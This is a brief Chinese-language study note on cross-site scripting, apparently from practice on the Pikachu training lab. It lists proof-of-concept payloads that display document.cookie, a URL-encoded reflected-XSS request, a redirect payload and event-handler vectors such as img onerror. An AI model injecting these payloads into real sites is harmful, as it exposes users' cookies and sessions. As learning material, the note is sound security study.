案例1:xss如何获取cookie?
弹窗,只有一个确定的提示框
<script>alert(document.cookie)</script>
get请求 内容都url里面
http://192.168.31.33/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=submit
拥有确定和取消的提示框
<script>confirm(document.cookie)</script>
可以输入文字的的框
<script>prompt(document.cookie)</script>
JavaScript中常见的对象
·document
·document.cookie返回cookie的值
·document.location.href跳转至某个页面
document.write在页面中写入
·String
·indexOf 返回某个指定的字符串值在字符串中首次出现的 位置
·对大小写敏感,没有发现时返回-1
·length 返回字符串的长度
<script>alert(document.location.href="https://www.baidu.com")</script>
直接跳转到百度
但是感觉没啥用毕竟没有人自己跳转到别的网站
JavaScript中的事件
·<a href= “demo.html”事件="alert('1');">test</a>
·事件:
·onmouseover:鼠标移入目标元素上方。鼠标移到其后代元素上时会触发。
·onmouseout:鼠标移出目标元素上方。
·onmouseenter:鼠标移入元素范围内触发,该事件不冒泡
onmouseleave:鼠标移出元素范围时触发,该事件不冒泡
<img src=""onerror=”JS代码”/>
·src:图片的来源,必写属性;
·当图片加载失败时触发onerror的事件;
了解一下就行
